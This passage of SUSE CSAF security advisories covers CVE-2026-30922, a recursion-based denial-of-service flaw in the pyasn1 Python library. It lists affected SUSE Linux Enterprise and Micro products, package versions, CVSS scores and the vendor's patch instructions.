"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20821-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20821-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620821-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20821-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024900.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-24T09:09:54Z",
"generator": {
"date": "2026-03-24T09:09:54Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20821-1",
"initial_release_date": "2026-03-24T09:09:54Z",
"revision_history": [
{
"date": "2026-03-24T09:09:54Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.5.0-4.1.noarch",
"product": {
"name": "python311-pyasn1-0.5.0-4.1.noarch",
"product_id": "python311-pyasn1-0.5.0-4.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.0",
"product": {
"name": "SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sl-micro:6.0"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-4.1.noarch as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:python311-pyasn1-0.5.0-4.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-4.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:python311-pyasn1-0.5.0-4.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:python311-pyasn1-0.5.0-4.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:python311-pyasn1-0.5.0-4.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T09:09:54Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:1158-1
Vulnerability from csaf_suse - Published: 2026-03-31 11:55 - Updated: 2026-03-31 11:55
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issues:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1158,SUSE-SLE-Micro-5.3-2026-1158,SUSE-SLE-Micro-5.4-2026-1158,SUSE-SLE-Micro-5.5-2026-1158,SUSE-SLE-Module-Basesystem-15-SP7-2026-1158,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2026-1158,SUSE-SLE-Product-HPC-15-SP4-LTSS-2026-1158,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2026-1158,SUSE-SLE-Product-HPC-15-SP5-LTSS-2026-1158,SUSE-SLE-Product-SLES-15-SP4-LTSS-2026-1158,SUSE-SLE-Product-SLES-15-SP5-LTSS-2026-1158,SUSE-SLE-Product-SLES-15-SP6-LTSS-2026-1158,SUSE-SLE-Product-SLES_SAP-15-SP4-2026-1158,SUSE-SLE-Product-SLES_SAP-15-SP5-2026-1158,SUSE-SLE-Product-SLES_SAP-15-SP6-2026-1158,SUSE-SUSE-MicroOS-5.2-2026-1158",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1158-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1158-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261158-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1158-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-March/045194.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-31T11:55:53Z",
"generator": {
"date": "2026-03-31T11:55:53Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1158-1",
"initial_release_date": "2026-03-31T11:55:53Z",
"revision_history": [
{
"date": "2026-03-31T11:55:53Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python2-pyasn1-0.4.2-150000.3.16.1.noarch",
"product": {
"name": "python2-pyasn1-0.4.2-150000.3.16.1.noarch",
"product_id": "python2-pyasn1-0.4.2-150000.3.16.1.noarch"
}
},
{
"category": "product_version",
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"product": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"product_id": "python3-pyasn1-0.4.2-150000.3.16.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.3",
"product": {
"name": "SUSE Linux Enterprise Micro 5.3",
"product_id": "SUSE Linux Enterprise Micro 5.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-micro:5.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.4",
"product": {
"name": "SUSE Linux Enterprise Micro 5.4",
"product_id": "SUSE Linux Enterprise Micro 5.4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-micro:5.4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.5",
"product": {
"name": "SUSE Linux Enterprise Micro 5.5",
"product_id": "SUSE Linux Enterprise Micro 5.5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-micro:5.5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-basesystem:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.2",
"product": {
"name": "SUSE Linux Enterprise Micro 5.2",
"product_id": "SUSE Linux Enterprise Micro 5.2",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-microos:5.2"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Micro 5.3",
"product_id": "SUSE Linux Enterprise Micro 5.3:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Micro 5.4",
"product_id": "SUSE Linux Enterprise Micro 5.4:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Micro 5.5",
"product_id": "SUSE Linux Enterprise Micro 5.5:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP6-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP6:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Micro 5.2",
"product_id": "SUSE Linux Enterprise Micro 5.2:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.2:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.3:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.2:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.3:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.2:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.3:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-31T11:55:53Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:1075-1
Vulnerability from csaf_suse - Published: 2026-03-26 12:41 - Updated: 2026-03-26 12:41
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issues:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1075,SUSE-SLE-Module-Public-Cloud-15-SP4-2026-1075,SUSE-SLE-Module-Python3-15-SP7-2026-1075,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2026-1075,SUSE-SLE-Product-HPC-15-SP4-LTSS-2026-1075,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2026-1075,SUSE-SLE-Product-HPC-15-SP5-LTSS-2026-1075,SUSE-SLE-Product-SLES-15-SP4-LTSS-2026-1075,SUSE-SLE-Product-SLES-15-SP5-LTSS-2026-1075,SUSE-SLE-Product-SLES-15-SP6-LTSS-2026-1075,SUSE-SLE-Product-SLES_SAP-15-SP4-2026-1075,SUSE-SLE-Product-SLES_SAP-15-SP5-2026-1075,SUSE-SLE-Product-SLES_SAP-15-SP6-2026-1075,openSUSE-SLE-15.6-2026-1075",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1075-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1075-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261075-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1075-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024958.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-26T12:41:27Z",
"generator": {
"date": "2026-03-26T12:41:27Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1075-1",
"initial_release_date": "2026-03-26T12:41:27Z",
"revision_history": [
{
"date": "2026-03-26T12:41:27Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"product": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
